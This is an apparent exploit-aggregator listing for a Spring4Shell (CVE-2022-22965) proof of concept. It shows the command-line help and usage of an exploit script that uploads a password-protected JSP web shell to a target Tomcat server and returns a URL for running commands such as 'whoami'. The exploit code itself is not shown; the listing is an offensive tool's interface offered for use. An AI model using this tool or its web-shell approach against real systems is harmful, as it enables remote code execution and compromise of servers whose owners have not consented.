Exploit for Code Injection in Vmware Spring Framework CVE-2022-22965

Name: Exploit for Code Injection in Vmware Spring Framework CVE-2022-22965
Rating: 5 (196 reviews)

2023-01-03 | CVSS 7.5

## https://sploitus.com/exploit?id=CAD3F237-9F09-5818-ADE3-DF36E8350D41
# Spring4Shell-CVE-2022-22965-POC

```bash
ghost㉿uchiha:~$ ./exploit.py --help                                     
usage: exploit.py [-h] [-f FILENAME] [-p PASSWORD] [-d DIRECTORY] url

Spring4Shell RCE Proof of Concept

positional arguments:
  url                   Target URL

options:
  -h, --help            show this help message and exit
  -f FILENAME, --filename FILENAME
                        Name of the file to upload (Default tomcatwar.jsp)
  -p PASSWORD, --password PASSWORD
                        Password to protect the shell with (Default: thm)
  -d DIRECTORY, --directory DIRECTORY
                        The upload path for the file (Default: ROOT)
```


## Usage
```bash
ghost㉿uchiha:~$ ./exploit.py http://url/
Shell Uploaded Successfully!
Your shell can be found at: http://url/tomcatwar.jsp?pwd=evil&cmd=whoami
```

Modified version of https://github.com/BobTheShoplifter/Spring4Shell-POC